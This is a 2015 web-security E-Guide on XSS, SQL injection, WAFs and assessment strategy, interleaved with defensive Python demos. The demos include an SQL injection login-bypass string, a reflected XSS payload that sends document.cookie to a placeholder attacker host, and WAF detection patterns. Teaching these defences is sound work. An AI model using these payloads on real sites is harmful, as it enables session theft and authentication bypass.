Web-facing Applications: Security Assessment Tools and Strategies

Posted 03-Sep-2015

Contents

Web-facing Applications: Mitigating Likely Web Application Threats

How to Review Your Web Application Security Assessment Tools, Strategy

Businesses are constantly creating Web applications that offer improved access to information. However, this online presence has opened the door to new information security threats, and Web application security assessments often fall short in their results. Read this expert E-Guide to learn how to properly assess Web application threats and which tools your organization can use.

Web-facing Applications: Mitigating Likely Web Application Threats

By Nick Lewis, Enterprise Threats

Nearly all businesses now cultivate a presence online. They do so not only to provide information, but also to interact with their customers via Web apps, blogs and forums. From an online retailer's interactive baby registry, to an electronic trading site's investment calculator, to a software vendor's interactive support forums, enterprises are spawning new Web applications daily that offer enhanced access to information.

This rapid rise of business-centric interactivity on the Web has, in turn, brought forth new information security threats that were not present in an organization's static webpages. These threats are targeted specifically at Web applications, including the supplementary Web servers, databases and other supporting infrastructure of an organization.

In this tip, we will examine the most urgent threats to Web-facing applications today and how security teams can make those applications more secure.

Urgent threats to Web-facing applications

There have been a number of recent reports from such vendors as Cenzic Inc., Hewlett-Packard Co., Imperva Inc., Veracode Inc., WhiteHat Security Inc. and, most recently, Verizon, which assessed numerous Web application threats facing enterprises today. The two most common threats to Web applications across all of the reports were cross-site scripting (XSS) and SQL injection. Both of these threats have been around for years, but Web applications remain vulnerable to them.

Given the prevalence of these incidents and the abundance of tools available for XSS and SQL injection attacks, organizations must significantly improve Web application security before the risk of such attacks can be reduced. New, less prevalent Web application threats have started to emerge, but most attacks still exploit these most basic weaknesses.
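The two flaws the reports above rank highest look like this in code. What follows is an added example, not code from the E-Guide or its authors: a login query built by string concatenation beside its parameterized form, and a greeting that reflects user input beside one that encodes it. The users table, the accounts and the attack strings are constructed for the demonstration.

```python
"""SQL injection and cross-site scripting, the two flaws the reports above rank
highest: the vulnerable pattern beside its fix. Added example, not from the
E-Guide; the users table, accounts and attack strings are constructed."""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database with a constructed users table. Passwords are stored
    in clear only to keep the injection demo short; real code stores a hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> bool:
    """Query built by string concatenation: the caller's text becomes SQL syntax."""
    query = (
        "SELECT 1 FROM users WHERE name = '" + name
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, name: str, password: str) -> bool:
    """Bound parameters: the driver hands the values to the engine as data,
    so a quote or comment marker in the input never changes the statement."""
    query = "SELECT 1 FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchone() is not None


def render_greeting_vulnerable(display_name: str) -> str:
    """Reflects the user-supplied name straight into the page body."""
    return "<p>Hello, " + display_name + "</p>"


def render_greeting_escaped(display_name: str) -> str:
    """Encodes the value for the HTML text context it lands in, so the browser
    shows the characters instead of parsing them as markup."""
    return "<p>Hello, " + html.escape(display_name, quote=True) + "</p>"


def demo() -> dict:
    """Run both attack strings through the vulnerable and the fixed code paths."""
    conn = make_db()
    # The closing quote ends the name literal and '--' comments out the
    # password check, so the statement matches alice with any password.
    sqli_name = "alice' --"
    # A reflected-XSS string that would run in the victim's browser; the host
    # name is a constructed placeholder.
    xss_name = "<script>location='http://attacker.invalid/?c='+document.cookie</script>"
    return {
        "sqli_bypasses_vulnerable": login_vulnerable(conn, sqli_name, "wrong"),
        "sqli_fails_parameterized": login_parameterized(conn, sqli_name, "wrong"),
        "valid_login_still_works": login_parameterized(conn, "alice", "s3cret"),
        "xss_raw_has_script_tag": "<script>" in render_greeting_vulnerable(xss_name),
        "xss_escaped_has_script_tag": "<script>" in render_greeting_escaped(xss_name),
    }


if __name__ == "__main__":
    for check, value in demo().items():
        print(f"{check}: {value}")
```

Running demo() shows the concatenated query accepting alice' -- with a wrong password while the parameterized query rejects it and still accepts the real credentials, and the escaped greeting no longer contains a script tag. The fix is the same idea in both cases: untrusted data must never become part of the syntax of the language it is handed to, whether that language is SQL or HTML.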

Making Web applications more secure

There are two basic ways for security teams to make Web applications more secure: improving Web application development, and implementing new tools to help manage new information security risks to Web applications. These methods complement each other and therefore should not be used individually without other security controls in place.

Improving Web application development to improve the security of Web applications should be part of any software or security development lifecycle. There are many resources on software development lifecycles (SDLCs), including Microsoft's and general resources from the DHS National Cyber Security Division on building security into enterprise software development. Most relevant to improving Web application security are the focused guides from the Open Web Application Security Project (OWASP), which include the Development Guide 2010, which discusses secure Web application development. As part of an SDLC, teams may want to include checks for the most prevalent threats to Web applications and regularly update the threat list. All of these tactics can be used to train developers in secure ways to improve applications, so that security bugs are minimized, found faster and fixed faster.

Separately, the other important way to mitigate threats to Web-facing applications is by implementing new tools to help manage Web application security. These tools may not be new per se, but for many organizations, products like Web application firewalls and Web application security scanners have never been a consideration, either because they have been able to avoid the compliance requirements that call for them, or because Web-based threats were never a significant concern.

Yet these and other related emerging Web defense technologies can be used to block Web application-layer attacks and to scan for Web application vulnerabilities. Web application security scanners can be included in your SDLC testing phase or run as a standalone project to proactively evaluate the security of your Web applications. Web application firewalls inspect Web traffic for attacks on a Web application, often blocking the most common attacks. That said, Web application firewalls and Web application security scanners will not block or detect all attacks or vulnerabilities, so both tools need to be constantly updated to detect new threats.

These tools should extend your existing controls, but you should understand how the urgent threats bypass many traditional security controls. For example, if you allow HTTP over port 80 through your firewall to a Web server, the firewall does not typically evaluate whether the network traffic is legitimate HTTP or whether it carries the SQL fragments of a SQL injection attack. A Web application firewall can inspect the HTTP traffic, identify most SQL injection attacks and, in many cases, block them. Remember, no single security tool or control can protect all of an enterprise's Web applications, although the combination of Web application firewalls and Web security scanning provides solid protection against the most common XSS and SQL injection attacks.
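The difference between what a port-based firewall rule sees and what a Web application firewall sees, as an added example that is not from the E-Guide. The HTTP requests, the host name and the signatures are constructed for the demonstration; the signatures are deliberately simple and are not any product's rule set.

```python
"""Port-based firewall rule versus Web application firewall inspection.
Added example, not from the E-Guide; requests and signatures are constructed."""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Signatures for the two most common attack classes. They are meant to run
# against decoded parameter values, not against the raw request text.
SQLI_PATTERNS = [
    re.compile(r"'\s*(or|and)\s+'?\w+'?\s*=\s*'?\w+", re.I),  # ' OR '1'='1
    re.compile(r"'\s*--"),                                     # quote, then comment
    re.compile(r"\bunion\s+(all\s+)?select\b", re.I),          # UNION SELECT
]
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),                         # <script>
    re.compile(r"\bon\w+\s*=", re.I),                          # onerror=, onload=
]

# Constructed sample traffic, all of it bound for port 80 of a made-up host.
SAMPLE_REQUESTS = {
    "benign_login": "POST /login HTTP/1.1\r\nHost: shop.example\r\n\r\nuser=alice&pass=s3cret",
    "encoded_sqli": "POST /login HTTP/1.1\r\nHost: shop.example\r\n\r\nuser=alice%27+--&pass=x",
    "reflected_xss": "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1\r\nHost: shop.example\r\n\r\n",
    "benign_keywords": "GET /search?q=credit+union+select HTTP/1.1\r\nHost: shop.example\r\n\r\n",
}


def network_firewall_allows(dst_port: int) -> bool:
    """A layer-3/4 rule: anything bound for port 80 passes, payload unseen."""
    return dst_port == 80


def raw_signature_hit(raw: str) -> bool:
    """Signatures over the undecoded request: misses URL- and form-encoded payloads."""
    return any(p.search(raw) for p in SQLI_PATTERNS + XSS_PATTERNS)


def parse_request(raw: str) -> dict:
    """Split a minimal HTTP/1.1 request into method, path and decoded parameters."""
    head, _, body = raw.partition("\r\n\r\n")
    method, target, _version = head.split("\r\n", 1)[0].split(" ", 2)
    parts = urlsplit(target)
    params = dict(parse_qs(parts.query, keep_blank_values=True))
    for key, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(key, []).extend(values)
    return {"method": method, "path": unquote_plus(parts.path), "params": params}


def waf_inspect(raw: str) -> list:
    """Return [(parameter, attack class)] for every decoded value that matches."""
    hits = []
    for name, values in parse_request(raw)["params"].items():
        for value in values:
            value = unquote_plus(value)  # second pass catches double-encoded input
            if any(p.search(value) for p in SQLI_PATTERNS):
                hits.append((name, "sqli"))
            elif any(p.search(value) for p in XSS_PATTERNS):
                hits.append((name, "xss"))
    return hits


def evaluate(raw: str, dst_port: int = 80) -> dict:
    """What each layer decides about one request."""
    return {
        "network_firewall": "allow" if network_firewall_allows(dst_port) else "deny",
        "raw_signature_hit": raw_signature_hit(raw),
        "waf_hits": waf_inspect(raw),
    }


if __name__ == "__main__":
    for label, raw in SAMPLE_REQUESTS.items():
        print(label, evaluate(raw))
```

For the encoded login request the port rule allows it, the signatures run over the raw text miss it, and only the decoded inspection flags the user parameter. The last sample shows the cost: a search for "credit union select" is flagged as SQL injection by the same keyword signature, which is why WAF rules have to be tuned against real traffic and why, as the article says, these tools cannot be treated as set-and-forget.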

Conclusion

New Web applications that allow organizations to interact with and improve relationships with customers have brought new information security risks that old static webpages did not carry. Traditional security controls on their own have been largely ineffective against the urgent Web application threats, but extending those controls to include Web application security in SDLCs and implementing new Web application security tools will help reduce the risk of these threats. Those that aren't using these technologies and don't have plans to do so should carefully weigh the benefits that such applications afford against the potential dangers of expanding their Web presence online. Securing today's Web-facing systems against these new threats has become an essential priority for any enterprise information security program.

About the author:

Nick Lewis, CISSP, is an information security architect at Saint Louis University. Nick received his Master of Science in Information Assurance from Norwich University in 2005 and Telecommunications from Michigan State University in 2002. Prior to joining Saint Louis University in 2011, Nick worked at the University of Michigan and previously at Children's Hospital Boston, the primary pediatric teaching hospital of Harvard Medical School, as well as for Internet2 and Michigan State University.

How to Review Your Web Application Security Assessment Tools, Strategy

By Cory Scott, Contributor

Web application security assessments often fail to produce meaningful results, leaving enterprise security teams scratching their heads about what went wrong. Some are quick to blame the tools in use, others blame a lack of application security training and talent in the information security team, and in many cases the assessment is treated like a checklist item that is given little time, planning or forethought.

Web application security assessments need to get close enough to the application to develop a threat model, look for common vulnerability patterns, and customize their approach based on an evaluation of the technologies in use rather than applying a one-size-fits-all approach. In this tip, we'll explore each of these points.

Does your Web application security assessment start by getting a grasp of the business purpose and the justification for why the application exists in the first place? Unless you can clearly state what the application's requirements and performance expectations are, you can't begin to assess it for vulnerabilities. After all, what may seem like a broken function may actually be an intended feature; what appears to be sluggish performance may be perfectly normal.

Don't let the application development team bury you in jargon or cryptic acronyms; if you don't know what something means, ask. Developers often forget that the Web application security assessment team is missing context that has already been established within their group. Get out the whiteboard and draw out the system as you understand it, and let them correct you or add that context.

Once you have a good understanding of the application, build a quick threat model. The following questions will help you to determine which vulnerabilities have meaningful effects on the application.

• Who is likely to attempt to abuse this application? Anonymous users on the Internet? Your customers? Internal users?

• Where is the trust boundary, and what attack surface is exposed to untrusted or semi-trusted users?

• What assets are worth protecting? Common assets include the integrity of the application's data, availability of the service, the confidentiality of user or company data, or the underlying operating system or network. Don't forget about client-side threats, where user sessions and browser integrity can be targeted.

• What incidents have taken place in the past, and what concerns keep the application team up at night?

• What security requirements were important enough to be documented, and, more importantly, what requirements were assumed or implied without being documented?

Web applications often share a set of "deadly features" that have a common and frequent pattern of vulnerabilities, usually platform-independent. File download and upload, custom session management, authorization and access control, homegrown single sign-on, password storage and reset mechanisms, email functionality and search functionality often have critical flaws because of the subtle complexity required to implement them safely. Make sure you identify these potential problem areas when you assess an application, as they are likely to require careful attention.
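A file-download handler, the first of the "deadly features" listed above, as an added example that is not from the E-Guide: the handler as it is usually first written, beside one that enforces containment within the document root. The document root, the files and the planted symlink are constructed in a temporary directory for the demonstration.

```python
"""File download: the handler as usually first written, beside one that
enforces containment in the document root. Added example, not from the
E-Guide; the document root, files and symlink are constructed in a temp dir."""
import os
import tempfile
from pathlib import Path


def download_path_naive(base_dir: str, requested: str) -> str:
    """Typical first cut: join and serve. '../' walks out of base_dir, and an
    absolute name replaces base_dir entirely (that is os.path.join's contract)."""
    return os.path.normpath(os.path.join(base_dir, requested))


def download_path_safe(base_dir: str, requested: str) -> Path:
    """Resolve '..' and symlinks on both sides, then require the result to sit
    strictly below the document root before touching the file."""
    root = Path(base_dir).resolve()
    candidate = (root / requested).resolve()
    if root not in candidate.parents:  # also rejects candidate == root
        raise PermissionError(f"refusing path outside document root: {requested}")
    if not candidate.is_file():
        raise FileNotFoundError(requested)
    return candidate


def demo() -> dict:
    """Exercise both handlers against traversal, an absolute path, a symlink
    planted inside the root, and a legitimate file. All paths are constructed."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "public"
        (root / "reports").mkdir(parents=True)
        (root / "reports" / "q1.pdf").write_bytes(b"%PDF-1.4 constructed")
        secret = Path(tmp) / "secret.txt"  # lives outside the document root
        secret.write_text("not for download")

        def blocked(name: str) -> bool:
            try:
                download_path_safe(str(root), name)
            except PermissionError:
                return True
            return False

        naive = download_path_naive(str(root), "../secret.txt")
        results["naive_escapes_root"] = Path(naive).read_text() == "not for download"
        results["safe_blocks_traversal"] = blocked("../secret.txt")
        results["safe_blocks_absolute"] = blocked(str(secret))
        results["safe_serves_valid"] = download_path_safe(
            str(root), "reports/q1.pdf").read_bytes().startswith(b"%PDF")
        try:
            (root / "latest.pdf").symlink_to(secret)
            results["safe_blocks_symlink"] = blocked("latest.pdf")
        except OSError:  # platform without symlink support: nothing to test
            results["safe_blocks_symlink"] = None
    return results


if __name__ == "__main__":
    for check, value in demo().items():
        print(f"{check}: {value}")
```

The naive handler happily reads a file one directory above the root; the safe one refuses traversal, an absolute name and a symlink that points outside, while still serving the legitimate report. Checking containment after resolving both sides is what makes the symlink case work; a string-prefix check on the unresolved path would pass it.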

An assessment approach should be customized to the situation at hand. If the application is a third-party product where source code is not available, dynamic vulnerability analysis with tools may be the preferred approach, and if the application has a high-risk posture, manual penetration testing may be the logical next step.

Where source is available, work hand-in-hand with the development team to use source code analysis tools to look for vulnerabilities. Don't just throw Web application security assessment tools over the wall and ask developers to run them. Get feedback on each tool's strengths, and invest time in learning how to set the tools up effectively to get sufficient coverage. When you first start using static code analysis tools, quickly throw out classes of findings that are not relevant to your threat model or are prone to false positives, to avoid fatigue.

When using dynamic analysis tools such as Web application vulnerability scanners, make sure the tool "understands" your application as much as possible, including where all the application endpoints are and what functionality exists. Too many people rely exclusively on a tool's ability to discover content and test it effectively without verifying that the most sensitive parts of the application are covered.
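One way to verify that a scanner actually reached the endpoints that matter, as an added example that is not from the E-Guide. The route table and the crawl-log lines are constructed samples, and the log format (one "METHOD URL STATUS" line per request) is assumed for the demonstration rather than taken from any particular product.

```python
"""Scanner coverage check: did the dynamic scan reach the endpoints that matter?
Added example, not from the E-Guide; the route table and crawl log are
constructed, and the log format is assumed (one "METHOD URL STATUS" per line)."""
import re

# Constructed route table as a framework would export it:
# (HTTP method, path template, sensitive?). Sensitive routes are the ones the
# assessment must cover whether or not the crawler finds them.
ROUTES = [
    ("GET",  "/",                      False),
    ("GET",  "/search",                False),
    ("POST", "/login",                 True),
    ("POST", "/password/reset",        True),
    ("GET",  "/account/{id}/export",   True),
    ("POST", "/admin/users/{id}/role", True),
    ("GET",  "/help",                  False),
]

# Constructed crawl log from a hypothetical scanner: one request per line.
CRAWL_LOG = """\
GET http://shop.example/ 200
GET http://shop.example/search?q=test 200
GET http://shop.example/search?q=%27 500
POST http://shop.example/login 302
GET http://shop.example/help 200
GET http://shop.example/account/17/export 200
"""


def template_to_regex(template: str):
    """Turn /account/{id}/export into ^/account/[^/]+/export$ so the concrete
    URLs the scanner requested can be matched back to their route."""
    parts = [r"[^/]+" if p.startswith("{") and p.endswith("}") else re.escape(p)
             for p in template.split("/")]
    return re.compile("^" + "/".join(parts) + "$")


def parse_crawl_log(text: str) -> set:
    """Return {(method, path)} the scanner actually sent; query strings dropped."""
    seen = set()
    for line in text.splitlines():
        if not line.strip():
            continue
        method, url, _status = line.split()
        path = re.sub(r"^https?://[^/]+", "", url).split("?", 1)[0] or "/"
        seen.add((method, path))
    return seen


def coverage_report(routes=ROUTES, log=CRAWL_LOG) -> dict:
    """Routes the scanner exercised, routes it never touched, and the subset of
    untouched routes marked sensitive, which need manual or scripted attention."""
    seen = parse_crawl_log(log)
    covered, missed, sensitive_missed = [], [], []
    for method, template, sensitive in routes:
        pattern = template_to_regex(template)
        hit = any(m == method and pattern.match(p) for m, p in seen)
        (covered if hit else missed).append((method, template))
        if sensitive and not hit:
            sensitive_missed.append((method, template))
    return {
        "covered": covered,
        "missed": missed,
        "sensitive_missed": sensitive_missed,
        "coverage": len(covered) / len(routes),
    }


if __name__ == "__main__":
    report = coverage_report()
    print(f"route coverage: {report['coverage']:.0%}")
    for method, template in report["sensitive_missed"]:
        print(f"NOT COVERED (sensitive): {method} {template}")
```

With the constructed data the scanner touched five of seven routes, but the two it never sent a request to are the password reset and the admin role change, exactly the kind of sensitive, form-driven or parameterized endpoints a crawler tends to miss. Diffing the application's own route table against what the scanner logged is a cheap way to catch that before the report is written.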

Manual penetration testing should be considered for high-risk applications, sometimes in conjunction with code review or dynamic analysis. Leverage your penetration testing resources to look for things that are difficult to automate, such as data leakage, authentication and authorization bypass, and cryptographic vulnerabilities.


When putting this approach together, realize that organizational change takes time. People who are used to steamrolling through the assessment process may be hesitant at first to dedicate the necessary time to produce a meaningful Web application security assessment. A step-wise approach that shows the value of the time spent, incrementally, will often break down some of the defensive barriers.

About the author:

Cory Scott is a San Francisco-based director at Matasano Security, an independent information security research and development firm.
